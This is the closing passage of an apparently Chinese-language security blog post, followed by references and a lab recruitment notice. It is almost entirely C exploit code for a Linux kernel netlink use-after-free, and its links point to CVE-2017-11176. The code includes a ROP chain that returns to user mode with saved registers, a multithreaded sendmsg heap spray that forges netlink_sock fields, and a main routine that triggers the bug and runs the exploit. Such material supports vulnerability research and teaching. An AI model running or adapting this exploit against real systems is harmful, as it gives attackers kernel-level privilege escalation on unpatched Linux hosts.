rop[r++] = user_cs;
rop[r++] = user_rflags;
rop[r++] = user_sp;
rop[r++] = user_ss;
memcpy(p, rop, sizeof(rop));
struct timeval tv;
memset(&tv, 0, sizeof(tv));//tv_sec和tv_usec都为0
if (_setsockopt(send_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) {
perror("timeo setsockopt wrong");
exit(-1);
}
while(_sendmsg(send_fd, &msg, MSG_DONTWAIT) > 0);
if (errno != EAGAIN) {
perror("heap sendmsg wrong");
exit(-1);
}
puts("ready to spray");
msg.msg_control = buf;
msg.msg_controllen = sizeof(buf);
struct spray_thread_arg arg[20];
for (int i=0; i<15; i++) {
*(unsigned int *)((size_t)buf + 0x2c0) = 0x12345000+i;//netlink_sock->portid
*(unsigned long *)((size_t)buf + 0x2d8) = 0;//netlink_sock->groups
arg[i].send_fd = _dup(send_fd);
arg[i].flag = 0;
arg[i].msg = &msg;
if (pthread_create(&arg[i].tid, NULL, heap_spray, &arg) < 0) {
perror("heap pthread wrong");
exit(-1);
}
}
puts("spray ends");
}
void save_state() {
asm(
"movq %%cs, %0n"
"movq %%ss, %1n"
"pushfqn"
"popq %2n"
:"=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
:
:"memory"
);
}
int main()
{
migrate_to_cpu0();
int sock_fd1=0;
int sock_fd2=0;
int unblock_fd=0;
save_state();
if ((sock_fd1 = prepare()) < 0){
perror("sock_fd");
exit(-1);
}
sock_fd2 = _dup(sock_fd1);
unblock_fd = _dup(sock_fd1);
puts("dup succeed");
vuln(sock_fd1,unblock_fd);
vuln(sock_fd2,unblock_fd);
exploit();
sleep(5);
puts("fake wake");
int optval = 0x1000;
_setsockopt(unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &optval, sizeof(optval));
return 0;
}
参考链接
- https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html
- https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html
- https://www.cnblogs.com/Cqlismy/p/11359196.html
团队信息
奇安信盘古石取证实验室,招收移动端漏洞研究人员和逆向工程师,坐标上海。